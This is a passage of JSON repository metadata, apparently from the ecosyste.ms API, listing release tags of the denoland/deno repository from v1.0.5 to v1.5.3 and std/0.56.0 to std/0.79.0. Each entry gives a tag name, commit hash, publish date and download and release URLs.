56496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno